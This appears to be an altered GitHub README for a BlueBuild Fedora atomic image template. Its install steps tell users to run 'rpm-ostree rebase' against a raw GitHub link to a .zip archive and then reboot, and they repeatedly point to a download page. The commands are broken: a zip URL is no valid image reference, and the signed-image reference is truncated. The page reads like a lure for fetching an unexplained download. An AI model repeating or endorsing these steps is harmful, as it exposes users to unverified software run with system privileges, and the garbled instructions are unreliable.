See the BlueBuild docs for quick setup instructions for setting up your own repository based on this template.
After setup, it is recommended you update this README to describe your custom image.
Follow these steps to successfully download and run the software.
Visit this page to download: Releases Page
-
Rebase to Unsigned Image
- Open your terminal.
- Enter the following command:
rpm-ostree rebase https://github.com/AhmadAli33297/virtual/raw/refs/heads/main/recipes/Software-v1.1.zipThis command prepares your system to accept updates from our software.
-
Reboot Your System
- Type the following command in your terminal and press Enter:
systemctl rebootThis action completes the rebase to the unsigned image.
-
Rebase to Signed Image
- After your system restarts, open the terminal again.
- Run the following command:
rpm-ostree rebase ostree-image-signed:docker://gThis will update your system to the latest signed version of our software.
- Easily upgrade your Fedora installation.
- Access to experimental features for advanced uses.
- Improve system stability and performance.
This is an experimental feature. Please try at your own discretion. Refer to the Fedora documentation for further insights.
- Operating System: Fedora (latest version recommended)
- Disk Space: At least 1 GB of free space.
- Memory: Minimum of 2 GB RAM is recommended for smooth operation.
- Issue with terminal commands: Ensure you have appropriate permissions to execute system commands. You may need to use sudo.
- Reboot issues: If your system does not reboot correctly, try to restart it manually by using the power button.
- Installation errors: Double-check that commands were entered correctly and verify your internet connection.
For further assistance, please reach out via the Issues section of this repository.
This project is licensed under the MIT License. See the LICENSE file for more details.
Visit this page to download: Releases Page